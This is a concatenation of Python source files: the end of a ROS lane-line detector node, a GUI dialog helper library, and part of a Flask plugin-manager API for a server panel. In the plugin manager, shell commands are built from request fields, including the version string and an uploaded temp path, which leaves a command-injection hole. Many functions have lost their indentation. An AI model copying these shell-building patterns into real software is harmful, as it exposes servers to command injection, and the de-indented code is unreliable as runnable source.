wid_original = image_cv.shape[1]
if self.image_size[0]!=hei_original or self.image_size[1]!=wid_original:
# image_cv = cv2.GaussianBlur(image_cv, (5,5), 2)
image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]), interpolation=cv2.INTER_NEAREST)
image_cv = image_cv[self.top_cutoff:,:,:]
# White balancing
if self.flag_wb and self.flag_wb_ref:
self.wb.correctImg(image_cv)
# Set the image to be detected
self.detector.setImage(image_cv)
# Detect lines and normals
# lines_white, normals_white = self.detector.detectLines('white')
# lines_yellow, normals_yellow = self.detector.detectLines('yellow')
# lines_red, normals_red = self.detector.detectLines('red')
# Draw lines and normals
# self.detector.drawLines(lines_white, (0,0,0))
# self.detector.drawLines(lines_yellow, (255,0,0))
# self.detector.drawLines(lines_red, (0,255,0))
#self.detector.drawNormals(lines_white, normals_white)
#self.detector.drawNormals(lines_yellow, normals_yellow)
#self.detector.drawNormals(lines_red, normals_red)
# SegmentList constructor
# segmentList = SegmentList()
# segmentList.header.stamp = image_msg.header.stamp
# Convert to normalized pixel coordinates, and add segments to segmentList
# arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
# arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
# if len(lines_white)>0:
# lines_normalized_white = ((lines_white + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_white, normals_white, Segment.WHITE))
# if len(lines_yellow)>0:
# lines_normalized_yellow = ((lines_yellow + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_yellow, normals_yellow, Segment.YELLOW))
# if len(lines_red)>0:
# lines_normalized_red = ((lines_red + arr_cutoff) * arr_ratio)
# segmentList.segments.extend(self.toSegmentMsg(lines_normalized_red, normals_red, Segment.RED))
"""
# Verbose
if self.verbose:
self.toc = rospy.get_time()
rospy.loginfo("[%s] Image processing time: %.3f ms" %(self.node_name, (self.toc-self.tic)*1000.0))
rospy.loginfo("[%s] Number of white segments = %d" %(self.node_name, len(lines_white)))
rospy.loginfo("[%s] number of yellow segments = %d" %(self.node_name, len(lines_yellow)))
rospy.loginfo("[%s] number of red segments = %d" %(self.node_name, len(lines_red)))
self.toc_pre = self.toc
# Publish segmentList
self.pub_lines.publish(segmentList)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent: %s" %(time_spent.to_sec()))
"""
# Publish the frame with lines
# image_msg_out = self.bridge.cv2_to_imgmsg(self.detector.getImage(), "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent on img: %s" %(time_spent.to_sec()))
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[LineDetectorNode] Shutdown.")
"""
def toSegmentMsg(self, lines, normals, color):
segmentMsgList = []
for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
segment = Segment()
segment.color = color
segment.pixels_normalized[0].x = x1
segment.pixels_normalized[0].y = y1
segment.pixels_normalized[1].x = x2
segment.pixels_normalized[1].y = y2
segment.normal.x = norm_x
segment.normal.y = norm_y
segmentMsgList.append(segment)
return segmentMsgList
"""
if __name__ == '__main__':
    # Standard ROS entry point: init node, register shutdown hook, spin.
    rospy.init_node('face_lulala_alphaduck', anonymous=False)
    node = FaceLulalaAlphaduckNode()
    rospy.on_shutdown(node.onShutdown)
    rospy.spin()
|
__init__.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Félix Chénier
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Limited Interaction
===================
Provides simple, backend-independent GUI tools for limited user interaction.
This module provides simple GUI tools that run in their own process, so that
they cannot conflict with the currently running event loop. If Matplotlib is
imported, its event loop is updated in the background while waiting for user
action.
Additional parameters
---------------------
All functions except `get_folder` and `get_filename` accept these
parameters in addition to their own parameters:
title
Title of the dialog window.
icon
Can be either None, a str from ['alert', 'clock', 'cloud', 'error',
'find', 'gear', 'info', 'light', 'lock', 'question', 'warning'], or a
tuple of png files: (path_to_image_in_dialog.png,
path_to_dock_icon.png)
left
Distance between the monitor's left edge and the window's left edge in
pixels. Parameters 'left' and 'right' cannot be used together.
right
Distance between the monitor's right edge and the window's right edge in
pixels. Parameters 'left' and 'right' cannot be used together.
top
Distance between the monitor's top edge and the window's top edge in
pixels. Parameters 'top' and 'bottom' cannot be used together.
bottom
Distance between the monitor's bottom edge and the window's bottom edge in
pixels. Parameters 'top' and 'bottom' cannot be used together.
min_width
Minimal width of the dialog window in pixels.
min_height
Minimal width of the dialog window in pixels.
"""
__author__ = "Félix Chénier"
__copyright__ = "Copyright (C) 2020 Félix Chénier"
__email__ = "chenier.felix@uqam.ca"
__license__ = "Apache 2.0"
import os
import sys
import json
import platform
import time
from threading import Thread
import subprocess
import warnings
from typing import Sequence, Union, List
import limitedinteraction.cmd as cmd
# Set some constants
# Platform flags used to pick OS-appropriate defaults below.
is_pc = True if platform.system() == 'Windows' else False
is_mac = True if platform.system() == 'Darwin' else False
is_linux = True if platform.system() == 'Linux' else False
# Directory containing this module (used to locate bundled resources).
my_path = os.path.dirname(os.path.abspath(__file__))
# Temporary folder
# Pick a per-user scratch folder for the flag files that coordinate with the
# child GUI processes; fall back to the current directory if anything fails.
try:
    if is_pc and 'TEMP' in os.environ:
        _base_temp_folder = os.environ['TEMP']
        _temp_folder = _base_temp_folder + '/limitedinteraction'
    elif is_mac and 'TMPDIR' in os.environ:
        _base_temp_folder = os.environ['TMPDIR']
        _temp_folder = _base_temp_folder + '/limitedinteraction'
    else:
        # Linux and everything else: hidden folder in the user's home.
        _temp_folder = os.environ['HOME'] + '/.limitedinteraction'
    try:
        os.mkdir(_temp_folder)
    except FileExistsError:
        pass
except Exception:
    warnings.warn('Could not set temporary folder.')
    _temp_folder = '.'
# Set some state variables
# One-element list: counter of message windows opened so far. A list is used
# so functions can mutate the counter without a `global` statement.
_message_window_int = [0]
def _define_polling_pause():
"""
Return the polling pause function.
The returned function is a wrapper to either matplotlib.pyplot.pause (in
the case where matplotlib is among the imported modules), or time.sleep
(if matplotlib is not imported).
"""
if 'matplotlib' in sys.modules:
import matplotlib.pyplot as plt
def polling_pause():
"""Pause while refreshing Matplotlib while waiting for user."""
# This rewrite of Matplotlib pause was found here:
# https://stackoverflow.com/questions/45729092/make-interactive-matplotlib-window-not-pop-to-front-on-each-update-windows-7/45734500#45734500
manager = plt._pylab_helpers.Gcf.get_active()
if manager is not None:
canvas = manager.canvas
if canvas.figure.stale:
canvas.draw_idle()
canvas.start_event_loop(0.2)
else:
time.sleep(0.2)
else:
def polling_pause():
"""Pause while waiting for user."""
time.sleep(0.2)
return polling_pause
def _launch_subprocess(blocking=True, debug=False, **kwargs):
    """Run cmd.py in its own process; if blocking, poll for its result
    while keeping the host event loop (Matplotlib, if any) alive."""
    output = [None]  # one-slot mailbox shared with the worker thread
    command_call = [
        sys.executable,  # python3
        cmd.__file__,    # cmd.py
        json.dumps(kwargs)]
    if debug:
        print('-------')
        print(f'command call: {command_call}')
        expanded = ''.join(f"'{part}' " for part in command_call)
        print('-------')
        print(f'expanded command call: {expanded}')

    def threaded_function():
        """Start cmd.py in its own process and wait for its completion."""
        if blocking:
            output[0] = subprocess.check_output(command_call,
                                                stderr=subprocess.DEVNULL)
        else:
            subprocess.call(command_call,
                            stderr=subprocess.DEVNULL)

    # Wrapping the subprocess in a thread leaves this function free to poll.
    worker = Thread(target=threaded_function)
    worker.start()
    if blocking:
        polling_pause = _define_polling_pause()
        while output[0] is None:
            polling_pause()  # Update event loop or just wait.
    if output[0] is None:
        return None
    decoded = json.loads(output[0].decode())
    # decoded == [error_name, payload]; an empty error name means success.
    if decoded[0] != '':
        if decoded[0] == 'ModuleNotFoundError':
            raise ModuleNotFoundError(decoded[1])
        if decoded[0] == 'ValueError':
            raise ValueError(decoded[1])
        raise Exception(decoded[0] + ': ' + decoded[1])
    return decoded[1]
def message(
        message: str,
        **kwargs) -> None:
    """
    Show or close a non-blocking message window.

    Parameters
    ----------
    message
        The message to show. Use '' (or None) to close the previous message
        windows.
    kwargs
        Consult the module's help for additional parameters.

    Returns
    -------
    None
    """
    # Begins by deleting the current message: the child process watching
    # its flag file exits as soon as the file disappears.
    for file in os.listdir(_temp_folder):
        if 'limitedinteraction_message_flag' in file:
            os.remove(_temp_folder + '/' + file)
    if message is None or message == '':
        return
    _message_window_int[0] += 1
    # Bug fix: the original f-string interpolated the list itself
    # (…message_flag[1]) instead of the counter (…message_flag1).
    flagfile = (f"{_temp_folder}/"
                f"limitedinteraction_message_flag{_message_window_int[0]}")
    # Context manager guarantees the handle is closed even on error.
    with open(flagfile, 'w') as fid:
        fid.write("DELETE THIS FILE TO CLOSE THE LIMITEDINTERACTION MESSAGE "
                  "WINDOW.")
    _launch_subprocess(
        blocking=False,
        function='message',
        message=message,
        flagfile=flagfile,
        **kwargs)
def button_dialog(
        message: str = 'Please select an option',
        choices: Sequence[str] = ['OK', 'Cancel'],
        **kwargs) -> int:
    """
    Show a blocking dialog window with a selection of buttons.

    Parameters
    ----------
    message
        Optional. Instruction shown to the user.
    choices
        Optional. Button captions, one str per button.
    kwargs
        Consult the module's help for additional parameters.

    Returns
    -------
    int
        Zero-based index of the clicked button; -1 when the user closes
        the window instead of clicking a button.
    """
    # Delegate to the helper that runs cmd.py in a separate process and
    # blocks (while keeping the event loop alive) until the user answers.
    return _launch_subprocess(
        function='button_dialog',
        message=message,
        choices=choices,
        **kwargs)
def input_dialog(
        message: str = '',
        labels: Sequence[str] = [],
        initial_values: Sequence[str] = [],
        masked: Sequence[bool] = [],
        **kwargs) -> Union[str, List[str]]:
    """
    Prompt the user with a blocking input dialog.

    Parameters
    ----------
    message
        Optional. Instruction shown to the user.
    labels
        Optional. One label per input field.
    initial_values
        Optional. One initial value per input field.
    masked
        Optional. One bool per input field; True masks the input with stars.
    kwargs
        Consult the module's help for additional parameters.

    Returns
    -------
    str or List[str]
        The entered str for a single input; a list of str for multiple
        inputs.
    """
    # The dialog runs in a separate process so that Matplotlib (if loaded)
    # keeps updating while we wait.
    return _launch_subprocess(
        function='input_dialog',
        message=message,
        labels=labels,
        initial_values=initial_values,
        masked=masked,
        **kwargs)
def get_folder(initial_folder: str = '.', **kwargs) -> str:
    """
    Select a folder interactively using a file dialog window.

    Parameters
    ----------
    initial_folder
        Optional. Folder the dialog starts in.

    Returns
    -------
    str
        Full path of the selected folder; '' when the user cancels.
    """
    # Blocking call into the out-of-process GUI helper.
    return _launch_subprocess(
        function='get_folder',
        initial_folder=initial_folder,
        **kwargs)
def get_filename(initial_folder: str = '.', **kwargs) -> str:
    """
    Select a file interactively using a file dialog window.

    Parameters
    ----------
    initial_folder
        Optional. Folder the dialog starts in.

    Returns
    -------
    str
        Full path of the selected file; '' when the user cancels.
    """
    # Blocking call into the out-of-process GUI helper.
    return _launch_subprocess(
        function='get_filename',
        initial_folder=initial_folder,
        **kwargs)
def run_tests():
    """Run interactive tests.

    Walks a human tester through every dialog type; each step asserts the
    value the tester's action should produce.
    """
    choice = button_dialog(
        "Now we will run Limited Interaction's tests.",
        ["OK, let's go", "Quit"],
        icon='gear')
    if choice == 0:
        #---- Non-interactive tests
        # Mismatched labels/initial_values lengths must raise ValueError.
        try:
            something = input_dialog('Test with bad arguments',
                                     labels=['one', 'two', 'three'],
                                     initial_values=['one', 'two'])
            raise ValueError('You should not see this error.')
        except ValueError:
            pass  # all is ok
        # 'left' and 'right' cannot be used together.
        try:
            something = button_dialog(left=0, right=0)
            raise ValueError('You should not see this error.')
        except ValueError:
            pass  # all is ok
        # 'top' and 'bottom' cannot be used together.
        try:
            something = button_dialog(top=0, bottom=0)
            raise ValueError('You should not see this error.')
        except ValueError:
            pass  # all is ok
        #---- Interactive tests
        choice = button_dialog(
            'Check that "Hello" is written in menu bar,\n'
            'then close the window.',
            ['Click here only if this window is not in the right-bottom corner'],
            title='Hello', right=0, bottom=0)
        assert choice == -1
        something = input_dialog('Close the window again.')
        assert something == -1
        something = input_dialog('Please enter "test".')
        assert something == 'test'
        inputs = input_dialog(
            'Click ok if:\n'
            '- first entry is 1\n'
            '- second entry is "test"\n'
            '- last entry is masked\n'
            '- you see labels titles.\n'
            'Close the window otherwise.',
            ['Label 1', 'Label 2', 'Label 3'],
            [1, 'test', 'you should not see it'],
            [False, False, True])
        assert inputs[0] == '1'
        assert inputs[1] == 'test'
        assert inputs[2] == 'you should not see it'
        message('Pick a folder that is not the current folder.')
        foldername = get_folder(icon='gear')
        message('Check that you are in the same folder that '
                'you just selected,\n'
                'then pick any file.')
        filename = get_filename(initial_folder=foldername, icon='gear')
        message('')
        # Bug fix: the f-string below had no placeholder, so the chosen
        # file name was never shown and `filename` was unused.
        choice = button_dialog(f'Did you select this file:\n{filename}?',
                               ['Yes', 'No'], icon='question')
        assert choice == 0
        button_dialog('Test completed.', ['OK'])
def __dir__():
return ['message', 'input_dialog', 'button_dialog', 'get_folder', 'get_filename']
|
plugins_api.py | # coding: utf-8
import psutil
import time
import os
import slemp
import re
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import threading
import multiprocessing
from flask import request
class pa_thread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    Bug fix: the original called ``self.func`` inside ``__init__``, so the
    work ran synchronously in the creating thread and ``start()``/``join()``
    did nothing. The call now happens in ``run()``, i.e. in the spawned
    thread, making the thread-pool callers actually concurrent.
    """

    def __init__(self, func, args, name=''):
        threading.Thread.__init__(self)
        self.name = name
        self.func = func
        self.args = args
        self.result = None  # filled in by run()

    def run(self):
        # Executed in the new thread once start() is called.
        self.result = self.func(*self.args)

    def getResult(self):
        # Call after join(); None if func raised or was never started.
        try:
            return self.result
        except Exception:
            return None
class plugins_api:
# --- class-level defaults ---
__tasks = None                      # lazy cache of pending install tasks
__plugin_dir = 'plugins'            # root folder, one subdir per plugin
__type = 'data/json/type.json'      # plugin category definitions
__index = 'data/json/index.json'    # plugins pinned to the index page
setupPath = None                    # server install root, set in __init__

def __init__(self):
    # NOTE(review): hard-coded relative path — presumably resolved against
    # the application's run directory; confirm against callers.
    self.setupPath = 'server'
##### ----- start ----- ###
def listApi(self):
    """HTTP handler: return one page of the plugin list as JSON.

    Query args: ``type`` (category id, '0' = all) and ``p`` (1-based page).
    """
    sType = request.args.get('type', '0')
    sPage = request.args.get('p', '1')
    # print sPage
    data = self.getPluginList(sType, int(sPage))
    return slemp.getJson(data)
def fileApi(self):
    """HTTP handler: return the raw contents of a file in a plugin dir.

    Query args: ``name`` (plugin directory) and ``f`` (file name).
    Returns '' when an argument is missing or the file does not exist.

    SECURITY fix: ``name`` and ``f`` come straight from the request, so
    the resolved path is now checked to stay inside the plugins root;
    the original allowed '../' traversal to read arbitrary files.
    """
    name = request.args.get('name', '')
    if name.strip() == '':
        return ''
    f = request.args.get('f', '')
    if f.strip() == '':
        return ''
    file = self.__plugin_dir + '/' + name + '/' + f
    # Reject any path that escapes the plugins root (e.g. name='../..').
    base = os.path.realpath(self.__plugin_dir)
    if not os.path.realpath(file).startswith(base + os.sep):
        return ''
    if not os.path.exists(file):
        return ''
    c = slemp.readFile(file)
    return c
def indexListApi(self):
    """HTTP handler: return the index-page plugin list as JSON."""
    data = self.getIndexList()
    return slemp.getJson(data)
def indexSortApi(self):
    """HTTP handler: persist a new ordering of the index-page plugins.

    Form arg ``ssort`` carries the sort data; empty input is rejected.
    """
    sort = request.form.get('ssort', '')
    if sort.strip() == '':
        return slemp.returnJson(False, 'Sort data cannot be empty!')
    data = self.setIndexSort(sort)
    if data:
        return slemp.returnJson(True, 'Success!')
    return slemp.returnJson(False, 'Fail!')
def installApi(self):
    """HTTP handler: queue a background install/upgrade task for a plugin.

    Form args: ``name`` and ``version``; the presence of ``upgrade``
    switches the task label from 'Install' to 'upgrade'.
    """
    name = request.form.get('name', '')
    version = request.form.get('version', '')
    mmsg = 'Install'
    # Bug fix: request.form is a dict-like object, so the original
    # hasattr(request.form, 'upgrade') was always False and upgrades were
    # always labelled as installs.
    if 'upgrade' in request.form:
        mmsg = 'upgrade'
    if name.strip() == '':
        return slemp.returnJson(False, 'Missing plugin name!', ())
    if version.strip() == '':
        return slemp.returnJson(False, 'Missing version information!', ())
    infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
    if not os.path.exists(infoJsonPos):
        return slemp.returnJson(False, 'Configuration file does not exist!', ())
    pluginInfo = json.loads(slemp.readFile(infoJsonPos))
    # NOTE(review): name/version are interpolated into a shell command; the
    # info.json existence check constrains name, but version is unchecked.
    execstr = "cd " + os.getcwd() + "/plugins/" + \
        name + " && /bin/bash " + pluginInfo["shell"] \
        + " install " + version
    taskAdd = (None, mmsg + '[' + name + '-' + version + ']',
               'execshell', '0', time.strftime('%Y-%m-%d %H:%M:%S'), execstr)
    slemp.M('tasks').add('id,name,type,status,addtime, execstr', taskAdd)
    return slemp.returnJson(True, 'Install task added to queue!')
def uninstallOldApi(self):
    """HTTP handler: queue a background uninstall task (legacy path).

    Form args: ``name`` and ``version``; the plugin's shell script is
    executed later by the task runner with 'uninstall <version>'.
    """
    rundir = slemp.getRunDir()  # NOTE(review): unused in this method
    name = request.form.get('name', '')
    version = request.form.get('version', '')
    if name.strip() == '':
        return slemp.returnJson(False, "Missing plugin name!", ())
    if version.strip() == '':
        return slemp.returnJson(False, "Missing version information!", ())
    infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
    if not os.path.exists(infoJsonPos):
        return slemp.returnJson(False, "Configuration file does not exist!", ())
    pluginInfo = json.loads(slemp.readFile(infoJsonPos))
    # Shell command executed later by the 'execshell' task worker.
    execstr = "cd " + os.getcwd() + "/plugins/" + \
        name + " && /bin/bash " + pluginInfo["shell"] \
        + " uninstall " + version
    taskAdd = (None, 'uninstall [' + name + '-' + version + ']',
               'execshell', '0', time.strftime('%Y-%m-%d %H:%M:%S'), execstr)
    slemp.M('tasks').add('id,name,type,status,addtime, execstr', taskAdd)
    return slemp.returnJson(True, 'Uninstall task added to queue!')
# The uninstall time is short, and it is not added to the task...
def uninstallApi(self):
    """HTTP handler: run the plugin's uninstall script synchronously.

    Unlike uninstallOldApi this executes immediately rather than queueing
    a task, because uninstalling is quick.
    """
    rundir = slemp.getRunDir()  # NOTE(review): unused in this method
    name = request.form.get('name', '')
    version = request.form.get('version', '')
    if name.strip() == '':
        return slemp.returnJson(False, "Missing plugin name!", ())
    if version.strip() == '':
        return slemp.returnJson(False, "Missing version information!", ())
    infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
    if not os.path.exists(infoJsonPos):
        return slemp.returnJson(False, "Configuration file does not exist!", ())
    pluginInfo = json.loads(slemp.readFile(infoJsonPos))
    execstr = "cd " + os.getcwd() + "/plugins/" + \
        name + " && /bin/bash " + pluginInfo["shell"] \
        + " uninstall " + version
    data = slemp.execShell(execstr)
    if slemp.isAppleSystem():
        # Debug output on macOS dev machines only (Python 2 print).
        print execstr
        print data[0], data[1]
    # Result of the shell run is intentionally not inspected (best effort).
    return slemp.returnJson(True, 'Uninstallation performed successfully!')
    # if data[1] == '':
    #     return slemp.returnJson(True, 'Uninstalled successfully!')
    # else:
    #     return slemp.returnJson(False, 'Uninstalling error message!' + data[1])
def checkApi(self):
    """HTTP handler: report whether a plugin's info.json exists."""
    plugin_name = request.form.get('name', '')
    if not plugin_name.strip():
        return slemp.returnJson(False, "Missing plugin name!", ())
    info_path = self.__plugin_dir + '/' + plugin_name + '/' + 'info.json'
    if os.path.exists(info_path):
        return slemp.returnJson(True, "Plugin exists!", ())
    return slemp.returnJson(False, "Configuration file does not exist!", ())
def setIndexApi(self):
    """HTTP handler: pin (status '1') or unpin a plugin on the index page."""
    plugin_name = request.form.get('name', '')
    status = request.form.get('status', '0')
    version = request.form.get('version', '')
    if status == '1':
        return self.addIndex(plugin_name, version)
    return self.removeIndex(plugin_name, version)
def settingApi(self):
    """HTTP handler: return the plugin's settings page (index.html)."""
    plugin_name = request.args.get('name', '')
    page_path = self.__plugin_dir + '/' + plugin_name + '/index.html'
    return slemp.readFile(page_path)
def runApi(self):
    """HTTP handler: call ``func`` in a plugin's python script.

    Form args: ``name``, ``func``, ``version``, ``args`` and ``script``
    (script name, default 'index').
    """
    name = request.form.get('name', '')
    func = request.form.get('func', '')
    version = request.form.get('version', '')
    args = request.form.get('args', '')
    script = request.form.get('script', 'index')
    data = self.run(name, func, version, args, script)
    # data behaves like (stdout, stderr): an empty data[1] means success.
    if data[1] == '':
        return slemp.returnJson(True, "OK", data[0].strip())
    return slemp.returnJson(False, data[1].strip())
def callbackApi(self):
    """HTTP handler: invoke a plugin callback and return its payload.

    Unlike runApi, here data[0] is a success flag and data[1] the payload
    (or error message).
    """
    name = request.form.get('name', '')
    func = request.form.get('func', '')
    args = request.form.get('args', '')
    script = request.form.get('script', 'index')
    data = self.callback(name, func, args, script)
    if data[0]:
        return slemp.returnJson(True, "OK", data[1])
    return slemp.returnJson(False, data[1])
def updateZipApi(self):
    """HTTP handler: receive an uploaded plugin zip, unpack it into a temp
    dir and return its (augmented) info.json for user confirmation.

    Bug fix: an already-installed plugin's info.json was read via
    ``slemp.ReadFile`` (wrong casing); the resulting AttributeError was
    swallowed by the bare except, so ``old_version`` always stayed '0'.
    ``slemp.readFile`` is used now, matching the rest of the class.
    """
    tmp_path = slemp.getRootDir() + '/temp'
    if not os.path.exists(tmp_path):
        os.makedirs(tmp_path)
    slemp.execShell("rm -rf " + tmp_path + '/*')
    tmp_file = tmp_path + '/plugin_tmp.zip'
    from werkzeug.utils import secure_filename
    from flask import request
    f = request.files['plugin_zip']
    if f.filename[-4:] != '.zip':
        return slemp.returnJson(False, 'Only zip files are supported!')
    f.save(tmp_file)
    slemp.execShell('cd ' + tmp_path + ' && unzip ' + tmp_file)
    os.remove(tmp_file)
    p_info = tmp_path + '/info.json'
    if not os.path.exists(p_info):
        # info.json not at the archive root: look for a subfolder that
        # contains both info.json and install.sh.
        d_path = None
        for df in os.walk(tmp_path):
            if len(df[2]) < 3:
                continue
            if not 'info.json' in df[2]:
                continue
            if not 'install.sh' in df[2]:
                continue
            if not os.path.exists(df[0] + '/info.json'):
                continue
            d_path = df[0]
        if d_path:
            tmp_path = d_path
            p_info = tmp_path + '/info.json'
    try:
        data = json.loads(slemp.readFile(p_info))
        data['size'] = slemp.getPathSize(tmp_path)
        if not 'author' in data:
            data['author'] = 'Unknown'
        if not 'home' in data:
            data['home'] = 'http://basoro.org/support'
        plugin_path = slemp.getPluginDir() + data['name'] + '/info.json'
        data['old_version'] = '0'
        data['tmp_path'] = tmp_path
        if os.path.exists(plugin_path):
            try:
                # Bug fix: was slemp.ReadFile (AttributeError, silently
                # swallowed), leaving old_version at '0'.
                old_info = json.loads(slemp.readFile(plugin_path))
                data['old_version'] = old_info['versions']
            except:
                pass
    except:
        slemp.execShell("rm -rf " + tmp_path)
        return slemp.returnJson(False, 'No plugin information found in the compressed package, please check the plugin package!')
    # Core plugins may never be replaced by an upload.
    protectPlist = ('openresty', 'mysql', 'php', 'csvn', 'gogs', 'pureftp')
    if data['name'] in protectPlist:
        return slemp.returnJson(False, '[' + data['name'] + '], Important plugins cannot be modified!')
    return slemp.getJson(data)
def inputZipApi(self):
    """HTTP handler: move an unpacked third-party plugin from the temp dir
    (prepared by updateZipApi) into the plugins directory."""
    plugin_name = request.form.get('plugin_name', '')
    tmp_path = request.form.get('tmp_path', '')
    if not os.path.exists(tmp_path):
        return slemp.returnJson(False, 'The temporary file does not exist, please upload again!')
    plugin_path = slemp.getPluginDir() + '/' + plugin_name
    if not os.path.exists(plugin_path):
        # Python 2 print of the shell result tuple — debug output only.
        print slemp.execShell('mkdir -p ' + plugin_path)
    # \cp bypasses any cp alias (e.g. cp -i), forcing overwrite.
    slemp.execShell("\cp -rf " + tmp_path + '/* ' + plugin_path + '/')
    slemp.execShell('chmod -R 755 ' + plugin_path)
    p_info = slemp.readFile(plugin_path + '/info.json')
    if p_info:
        slemp.writeLog('Software management', 'Install third-party plugins [%s]' %
                       json.loads(p_info)['title'])
        return slemp.returnJson(True, 'Successful installation!')
    # info.json missing after the copy: roll the install back.
    slemp.execShell("rm -rf " + plugin_path)
    return slemp.returnJson(False, 'Installation failed!')
##### ----- end ----- ###
# does the process exist
def processExists(self, pname, exe=None):
    """Return True when a process named *pname* (optionally with the exact
    executable path *exe*) is currently running.

    Bug fix: the original read ``self.pids`` which is never defined on the
    class, so an AttributeError was raised immediately and the outer bare
    ``except`` made the method always return True. The pid snapshot is now
    created on demand and cached on the instance.
    """
    try:
        if not getattr(self, 'pids', None):
            # Take one snapshot per instance to avoid rescanning /proc.
            self.pids = psutil.pids()
        for pid in self.pids:
            try:
                p = psutil.Process(pid)
                if p.name() == pname:
                    if not exe:
                        return True
                    else:
                        if p.exe() == exe:
                            return True
            except:
                # Process exited or is inaccessible; skip it.
                pass
        return False
    except:
        # Conservative default kept from the original behaviour.
        return True
# Check if it is installing
def checkSetupTask(self, sName, sVer, sCoexist):
    """Return the queue status of any pending install/uninstall task for
    the plugin ('1' = no pending task).

    Matches task names of the form '...[name-version]'. When sCoexist is
    truthy both name and version must match; otherwise the name alone.
    """
    if not self.__tasks:
        # Lazy-load and cache the pending tasks (status != '1').
        self.__tasks = slemp.M('tasks').where(
            "status!=?", ('1',)).field('status,name').select()
    isTask = '1'
    for task in self.__tasks:
        # Extract the 'name-version' part between the square brackets.
        tmpt = slemp.getStrBetween('[', ']', task['name'])
        if not tmpt:
            continue
        tmp1 = tmpt.split('-')
        name1 = tmp1[0].lower()
        if sCoexist:
            if name1 == sName and tmp1[1] == sVer:
                isTask = task['status']
        else:
            if name1 == sName:
                isTask = task['status']
    return isTask
def checkStatus(self, info):
    """Return True when the plugin is installed and its service script
    reports 'start'."""
    if not info['setup']:
        return False
    status = self.run(info['name'], 'status', info['setup_version'])
    return status[0] == 'start'
def checkStatusProcess(self, info, i, return_dict):
    """Multiprocessing worker: store the plugin's running state in
    return_dict[i]."""
    if not info['setup']:
        return_dict[i] = False
        return
    status = self.run(info['name'], 'status', info['setup_version'])
    return_dict[i] = (status[0] == 'start')
def checkStatusThreads(self, info, i):
    """Thread worker: return the plugin's running state. ``i`` is unused
    but kept for signature compatibility with the thread pool caller."""
    if not info['setup']:
        return False
    status = self.run(info['name'], 'status', info['setup_version'])
    return status[0] == 'start'
def checkStatusMThreads(self, plugins_info):
    """Fill in the 'status' field of every plugin, one pa_thread each.

    NOTE(review): confirm pa_thread defers the call to run(); if it runs
    func in __init__, this loop is effectively sequential.
    """
    try:
        threads = []
        ntmp_list = range(len(plugins_info))
        for i in ntmp_list:
            t = pa_thread(self.checkStatusThreads, (plugins_info[i], i))
            threads.append(t)
        for i in ntmp_list:
            threads[i].start()
        for i in ntmp_list:
            threads[i].join()
        for i in ntmp_list:
            t = threads[i].getResult()
            plugins_info[i]['status'] = t
    except Exception as e:
        # Best effort: keep the list usable even if a worker failed
        # (Python 2 print statement).
        print 'checkStatusMThreads:', str(e)
    return plugins_info
def checkStatusMProcess(self, plugins_info):
    """Fill in the 'status' field of every plugin using one subprocess per
    plugin.

    Bug fix: the final loop iterated over ``ntmp_list``, which is never
    defined in this method (copy/paste from getAllListProcess), raising a
    NameError; it now iterates the plugin indices directly and reads the
    shared dict by key instead of relying on values() ordering.
    """
    manager = multiprocessing.Manager()
    return_dict = manager.dict()
    jobs = []
    for i in range(len(plugins_info)):
        p = multiprocessing.Process(
            target=self.checkStatusProcess, args=(plugins_info[i], i, return_dict))
        jobs.append(p)
        p.start()
    for proc in jobs:
        proc.join()
    for i in range(len(plugins_info)):
        # Keyed access: checkStatusProcess stores return_dict[i] for each i.
        plugins_info[i]['status'] = return_dict[i]
    return plugins_info
def checkDisplayIndex(self, name, version):
    """Return True when 'name-version' (any version, if a list is given)
    is pinned in the index file."""
    if not os.path.exists(self.__index):
        # First run: create an empty index file.
        slemp.writeFile(self.__index, '[]')
    indexList = json.loads(slemp.readFile(self.__index))
    candidates = version if type(version) == list else [version]
    for ver in candidates:
        if name + '-' + ver in indexList:
            return True
    return False
def getVersion(self, path):
    """Return the stripped contents of path/version.pl, or '' if absent."""
    version_file = path + '/version.pl'
    if not os.path.exists(version_file):
        return ''
    return slemp.readFile(version_file).strip()
# Construct local plugin information
def getPluginInfo(self, info):
    """Build the UI-facing plugin dict from one single-version info.json
    spec.

    Resolves relative 'checks'/'path' entries against the root directory,
    substitutes VERSION placeholders, and fills the task/display/setup
    fields. 'status' is always left False; callers resolve it separately
    (see checkStatusMThreads).
    """
    checks = ''
    path = ''
    coexist = False
    # Absolute paths are kept; relative ones are anchored at the root dir.
    if info["checks"][0:1] == '/':
        checks = info["checks"]
    else:
        checks = slemp.getRootDir() + '/' + info['checks']
    if info.has_key('path'):
        path = info['path']
        if path[0:1] != '/':
            path = slemp.getRootDir() + '/' + path
    if info.has_key('coexist') and info['coexist']:
        coexist = True
    pInfo = {
        "id": 10000,
        "pid": info['pid'],
        "type": 1000,
        "name": info['name'],
        "title": info['title'],
        "ps": info['ps'],
        "dependnet": "",
